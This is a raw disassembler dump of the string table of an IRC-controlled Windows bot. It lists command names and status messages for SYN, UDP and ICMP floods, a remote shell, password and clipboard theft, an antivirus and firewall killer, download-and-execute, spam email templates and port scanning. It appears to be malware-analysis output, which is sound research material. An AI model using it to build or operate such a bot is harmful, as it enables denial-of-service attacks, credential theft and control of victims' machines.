aRandom_0 db 'random',0 ; DATA XREF: sub_408A18+5287�o
; sub_411A79+2CA�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_408A18+5273�o
; sub_411A79+292�o
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_408A18:loc_40DBB1�o
align 4
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_408A18+5192�o
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_408A18+517B�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_408A18+5162�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_408A18+5142�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aAb db 'ab',0 ; DATA XREF: sub_408A18+510F�o
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_408A18+50FE�o
align 4
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_408A18+50A5�o
align 4
aUpload db 'upload',0 ; DATA XREF: sub_408A18+507F�o
align 4
aHcon db 'hcon',0 ; DATA XREF: sub_408A18+505E�o
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_408A18+504A�o
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_408A18+4F84�o
align 4
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_408A18+4F7C�o
align 4
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_408A18+4F20�o
align 4
aSecureFailedTo db '[SECURE]: Failed to start secure thread, error: <%d>.',0
; DATA XREF: sub_408A18+4EF6�o
; sub_40E745+3DE�o
align 10h
aSecureSSystem_ db '[SECURE]: %s system.',0 ; DATA XREF: sub_408A18+4E92�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_408A18+4E8C�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_408A18+4E85�o
align 10h
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_408A18+4DF7�o
align 4
aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_408A18+4D9E�o
; sub_411080+A1�o
aFindfile_0 db '[FINDFILE]',0 ; DATA XREF: sub_408A18+4CD0�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_408A18+4CCB�o
align 4
aProc db '[PROC]',0 ; DATA XREF: sub_408A18+4CBB�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_408A18+4CB6�o
align 4
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_408A18+4C80�o
align 4
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_408A18:loc_40D68B�o
align 4
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_408A18+4C5E�o
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_408A18:loc_40D669�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+4C28�o
align 4
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_408A18+4BDA�o
align 10h
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_408A18+4B9B�o
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_408A18+4B68�o
align 4
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_408A18+4B07�o
align 4
aSub db 'sub',0 ; DATA XREF: sub_408A18+4AE5�o
aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_408A18+4A8F�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_408A18+4A5F�o
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_408A18+4A04�o
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_408A18+495D�o
align 10h
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_408A18+492D�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_408A18+48D9�o
align 10h
aProcsFailedToS db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_408A18+4863�o
align 4
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_408A18+4802�o
aFull db 'full',0 ; DATA XREF: sub_408A18+47E6�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_408A18+4780�o
align 4
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_408A18+472C�o
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_408A18:loc_40D0B6�o
align 4
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_408A18+4694�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_408A18+4675�o
align 10h
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_408A18+465F�o
align 4
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_408A18+4630�o
align 4
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_408A18:loc_40D036�o
align 4
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_408A18+4609�o
align 4
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_408A18:loc_40D005�o
align 4
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_408A18:loc_40CFFE�o
align 4
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_408A18+45DF�o
align 4
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_408A18+4571�o
align 4
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_408A18+4518�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_408A18+4438�o
align 4
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_408A18+42A8�o
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_408A18+418B�o
align 4
aFindpassFail_0 db '[FINDPASS]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_408A18+4163�o
aFindpassSearch db '[FINDPASS]: Searching for password.',0 ; DATA XREF: sub_408A18+4100�o
aScanFailedTo_1 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_408A18+40C5�o
; sub_408A18+580C�o
align 4
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_408A18+3FFD�o
; sub_408A18+5A45�o
db 'for %d minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_408A18+3FD2�o
; sub_408A18+5A1A�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_408A18+3FCB�o
; sub_408A18+5A13�o
align 10h
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_408A18+3DF4�o
; sub_408A18+56D4�o
align 4
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_408A18+3D90�o
align 4
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_408A18+3D73�o
align 4
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_408A18+3D52�o
align 4
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_408A18+3D38�o
align 4
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_408A18:loc_40C6D7�o
align 4
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_408A18+3CB8�o
align 4
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_408A18:loc_40C68B�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_408A18+3C69�o
align 4
aAll db 'all',0 ; DATA XREF: sub_408A18+3C53�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_408A18+3BC6�o
; sub_408A18:loc_40D652�o
align 4
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_408A18+3B45�o
align 4
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_408A18:loc_40C544�o
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_408A18+3B22�o
align 4
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_408A18+3AED�o
align 4
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0 ; DATA XREF: sub_408A18+3AC5�o
align 10h
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_408A18+3AAF�o
align 4
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_408A18:loc_40C478�o
aProcProcessK_1 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_408A18+3A59�o
align 10h
aProcProcessK_0 db '[PROC]: Process killed & deleted: %s',0 ; DATA XREF: sub_408A18+3A11�o
align 4
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_408A18:loc_40C3CA�o
align 4
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_408A18+39AB�o
align 4
aFileDeletedS_0 db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_408A18+3954�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_408A18+392F�o
align 10h
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_408A18:loc_40C2EF�o
align 4
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_408A18+38D0�o
align 4
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_408A18+3890�o
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_408A18+3888�o
align 10h
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_408A18+3831�o
align 10h
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_408A18+381B�o
align 10h
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_408A18+3798�o
align 4
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_408A18:loc_40C16C�o
align 4
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_408A18+373E�o
align 4
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_408A18+3689�o
align 4
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_408A18+3646�o
align 10h
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_408A18+35DB�o
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_408A18+355B�o
align 4
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+351F�o
; sub_408A18+3D42�o
align 4
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_408A18+34FA�o
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+34EC�o
align 4
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_408A18+34C0�o
align 10h
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_408A18+3451�o
align 4
aModeS db 'MODE %s',0 ; DATA XREF: sub_408A18+33F9�o
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_408A18+33C6�o
align 4
aNickS db 'NICK %s',0 ; DATA XREF: sub_408A18+336D�o
; sub_408A18+3B8D�o
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_408A18+334C�o
align 4
aS_5 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+3318�o
; sub_408A18+33A5�o ...
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_408A18+32DF�o
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_408A18:loc_40BCE4�o
align 4
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_408A18+3291�o
align 10h
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_408A18:loc_40BC16�o
align 10h
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_408A18+31BA�o
; sub_408A18+326B�o ...
align 10h
aUpdateUpToDate db '[UPDATE]: Up to Date',0 ; DATA XREF: sub_408A18+3146�o
align 4
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_408A18+311E�o
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_408A18+30BF�o
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_408A18+3018�o
align 4
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_408A18+2F94�o
align 4
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_408A18+2F81�o
align 4
aFindfileFailed db '[FINDFILE]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_408A18+2ECD�o
aFindfileSear_0 db '[FINDFILE]: Searching for file: %s in: %s.',0
; DATA XREF: sub_408A18+2E69�o
align 10h
aFile db '[FILE]:',0 ; DATA XREF: sub_408A18:loc_40B7DF�o
; sub_408A18:loc_40C373�o
aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_408A18+2DAF�o
align 4
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_408A18+2D66�o
align 4
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_408A18+2D3E�o
align 10h
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_408A18+2CCE�o
align 4
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_408A18+2C42�o
align 10h
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_408A18+2BDF�o
align 4
aDdosFailedToSt db '[DDoS]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_408A18+2B2F�o
align 10h
aDdosFloodingSS db '[DDoS]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_408A18+2AC5�o
align 4
aSynFailedToSta db '[SYN]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_408A18+2A31�o
align 10h
aSynFloodingSSF db '[SYN]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_408A18+29C7�o
align 4
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_408A18+291F�o
align 4
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_408A18+28C0�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_408A18+27A2�o
align 10h
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_408A18+2747�o
aScanFailedTo_0 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_408A18+26A5�o
; sub_408A18+405C�o ...
align 4
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_408A18+264A�o
align 4
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_408A18+25C4�o
align 4
aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_408A18+24A9�o
align 4
dword_426F84 dd 54434101h, 204E4F49h, 17325h ; sub_408A18+35B6�o
dword_426F90 dd 615F63h aC_action db 'c_action',0 ; DATA XREF: sub_408A18+2384�o
align 10h
aC_pm db 'c_pm',0 ; DATA XREF: sub_408A18+2370�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_408A18+235C�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_408A18+2348�o
align 4
aScan db 'scan',0 ; DATA XREF: sub_408A18+2334�o
align 10h
aRd db 'rd',0 ; DATA XREF: sub_408A18+2320�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_408A18+230C�o
align 10h
aDl db 'dl',0 ; DATA XREF: sub_408A18+22F8�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_408A18+22E4�o
align 10h
aSyn db 'syn',0 ; DATA XREF: sub_408A18+22D0�o
; sub_408A18+525F�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_408A18+22BC�o
align 10h
aC: ; DATA XREF: sub_408A18+226C�o
; sub_413FFD+73�o
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_408A18+2258�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_408A18+2232�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_408A18+221E�o
align 10h
aMv db 'mv',0 ; DATA XREF: sub_408A18+220A�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_408A18+21F6�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_408A18+21E2�o
align 10h
aFindfile db 'findfile',0 ; DATA XREF: sub_408A18+21CE�o
align 4
aE: ; DATA XREF: sub_408A18+21BA�o
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_408A18+21A6�o
aUpdate db 'update',0 ; DATA XREF: sub_408A18+217E�o
align 10h
aDe db 'de',0 ; DATA XREF: sub_408A18+216A�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_408A18+2156�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_408A18+2142�o
align 10h
aRepeat db 'repeat',0 ; DATA XREF: sub_408A18+212E�o
; sub_408A18+3249�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_408A18+211A�o
aC_part db 'c_part',0 ; DATA XREF: sub_408A18+2106�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_408A18+20F2�o
aC_join db 'c_join',0 ; DATA XREF: sub_408A18+20DE�o
align 10h
aC_n db 'c_n',0 ; DATA XREF: sub_408A18+20CA�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_408A18+20B6�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_408A18+20A2�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_408A18+208E�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_408A18+207A�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_408A18+2066�o
align 4
aM: ; DATA XREF: sub_408A18+2052�o
unicode 0, <m>,0
aMode db 'mode',0 ; DATA XREF: sub_408A18+203E�o
align 10h
aCy db 'cy',0 ; DATA XREF: sub_408A18+202A�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_408A18+2016�o
align 4
aA_1: ; DATA XREF: sub_408A18+2002�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_408A18+1FEE�o
align 4
aPm_0 db 'pm',0 ; DATA XREF: sub_408A18+1FDA�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_408A18+1FC6�o
aAa db 'aa',0 ; DATA XREF: sub_408A18+1FB2�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_408A18+1F9E�o
align 4
aAvfwFailedToSt db '[AVFW]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: sub_408A18+1F26�o
align 10h
aAvfw db '[AVFW]',0 ; DATA XREF: sub_408A18+1ECC�o
; sub_408A18+1F7E�o
align 4
aKillerThread db 'Killer Thread',0 ; DATA XREF: sub_408A18+1EC7�o
; sub_408A18+1F79�o
align 4
aAvfwAvFwBotKil db '[AVFW]: AV/FW/BOT Killer active.',0 ; DATA XREF: sub_408A18+1EB1�o
align 4
aAvfwkiller db 'avfwkiller',0 ; DATA XREF: sub_408A18+1E86�o
align 4
aGh db 'gh',0 ; DATA XREF: sub_408A18+1E72�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_408A18+1E5E�o
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_408A18:loc_40A862�o
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_408A18:loc_40A85B�o
align 4
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_408A18:loc_40A80E�o
align 4
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_408A18+1DEC�o
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_408A18:loc_40A76C�o
align 10h
aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_408A18+1D4A�o
align 10h
aShare db 'share',0 ; DATA XREF: sub_408A18+1CDE�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_408A18+1CAA�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_408A18+1C93�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_408A18+1C7C�o
; sub_408A18+1F60�o
align 4
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_408A18:loc_40A686�o
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_408A18+1C64�o
align 10h
aStart db 'start',0 ; DATA XREF: sub_408A18+1C11�o
; sub_408A18+1E9B�o
align 4
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_408A18+1BD7�o
aNet db 'net',0 ; DATA XREF: sub_408A18+1BB5�o
aRf db 'rf',0 ; DATA XREF: sub_408A18+1BA1�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_408A18+1B8D�o
align 10h
aCm db 'cm',0 ; DATA XREF: sub_408A18+1B79�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_408A18+1B65�o
aMirc db 'mirc',0 ; DATA XREF: sub_408A18+1B51�o
align 10h
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_408A18+1B3D�o
aLi db 'li',0 ; DATA XREF: sub_408A18+1B29�o
align 4
aList_0 db 'list',0 ; DATA XREF: sub_408A18+1B15�o
align 4
aDel db 'del',0 ; DATA XREF: sub_408A18+1B01�o
aDelete db 'delete',0 ; DATA XREF: sub_408A18+1AED�o
; sub_408A18+1CC4�o
align 10h
aKi db 'ki',0 ; DATA XREF: sub_408A18+1AD9�o
align 4
aKill db 'kill',0 ; DATA XREF: sub_408A18+1AC5�o
align 4
aKdp db 'kdp',0 ; DATA XREF: sub_408A18+1AB1�o
aKilldelproc db 'killdelproc',0 ; DATA XREF: sub_408A18+1A9D�o
aKp db 'kp',0 ; DATA XREF: sub_408A18+1A89�o
align 10h
aKillproc db 'killproc',0 ; DATA XREF: sub_408A18+1A75�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_408A18+1A61�o
align 10h
aDns db 'dns',0 ; DATA XREF: sub_408A18+1A4D�o
aSe db 'se',0 ; DATA XREF: sub_408A18+1A39�o
align 4
aO: ; DATA XREF: sub_408A18+1A11�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_408A18+19FD�o
; sub_408A18+3B09�o ...
align 4
aPr db 'pr',0 ; DATA XREF: sub_408A18+19E9�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_408A18+19D5�o
align 10h
aC_rn db 'c_rn',0 ; DATA XREF: sub_408A18+19C1�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_408A18+19AD�o
align 4
aC_q db 'c_q',0 ; DATA XREF: sub_408A18+1999�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_408A18+1985�o
align 10h
aK: ; DATA XREF: sub_408A18+1971�o
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_408A18+195D�o
align 10h
aRaw db 'raw',0 ; DATA XREF: sub_408A18+1935�o
aPt db 'pt',0 ; DATA XREF: sub_408A18+1921�o
align 4
aPart_0 db 'part',0 ; DATA XREF: sub_408A18+190D�o
align 10h
aJ: ; DATA XREF: sub_408A18+18F9�o
unicode 0, <j>,0
aJoin db 'join',0 ; DATA XREF: sub_408A18+18E5�o
align 4
aN: ; DATA XREF: sub_408A18+18D1�o
unicode 0, <n>,0
aNick_0 db 'nick',0 ; DATA XREF: sub_408A18+18BD�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_408A18+1883�o
aFp db 'fp',0 ; DATA XREF: sub_408A18+186F�o
align 4
aFindpass db 'findpass',0 ; DATA XREF: sub_408A18+185B�o
align 10h
aTftp db 'tftp',0 ; DATA XREF: sub_408A18+1847�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_408A18+1833�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_408A18+181F�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_408A18+180B�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_408A18+17F7�o
align 10h
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_408A18+17E3�o
align 10h
aCip db 'cip',0 ; DATA XREF: sub_408A18+17CF�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_408A18+17BB�o
align 10h
aFdns db 'fdns',0 ; DATA XREF: sub_408A18+17A7�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_408A18+1793�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_408A18+177F�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_408A18+176B�o
align 4
aGc db 'gc',0 ; DATA XREF: sub_408A18+1757�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_408A18+1743�o
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_408A18+16F9�o
align 8
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_408A18+1678�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a_: ; DATA XREF: sub_408A18+15D8�o
unicode 0, <_>,0
aEmail db 'email',0 ; DATA XREF: sub_408A18+156D�o
align 10h
aTcp db 'tcp',0 ; DATA XREF: sub_408A18+1559�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_408A18+1545�o
align 10h
aP: ; DATA XREF: sub_408A18+1531�o
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_408A18+151D�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_408A18+1509�o
align 4
aU: ; DATA XREF: sub_408A18+14F5�o
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_408A18+14E1�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_408A18+14CD�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_408A18+14B9�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_408A18+14A5�o
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_408A18+1481�o
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_408A18+144D�o
; sub_4124DC+46�o
align 10h
aEmpty db '<Empty>',0 ; DATA XREF: sub_408A18+1440�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_408A18+141D�o
align 4
aWho db 'who',0 ; DATA XREF: sub_408A18+1404�o
aCmd_0 db '[CMD]',0 ; DATA XREF: sub_408A18+13F6�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_408A18+13F1�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_408A18+13DC�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_408A18+13C8�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_408A18+13B4�o
aDll db 'dll',0 ; DATA XREF: sub_408A18+13A0�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_408A18+138C�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_408A18+1378�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_408A18+1364�o
align 4
aUp db 'up',0 ; DATA XREF: sub_408A18+1350�o
; sub_408A18+2192�o
align 10h
aUptime db 'uptime',0 ; DATA XREF: sub_408A18+133C�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_408A18+1328�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_408A18+1314�o
align 4
aErradicate db 'erradicate',0 ; DATA XREF: sub_408A18+1300�o
align 10h
aDestroy db 'destroy',0 ; DATA XREF: sub_408A18+12EC�o
aSi db 'si',0 ; DATA XREF: sub_408A18+12D8�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_408A18+12C4�o
aNi db 'ni',0 ; DATA XREF: sub_408A18+12B0�o
align 4
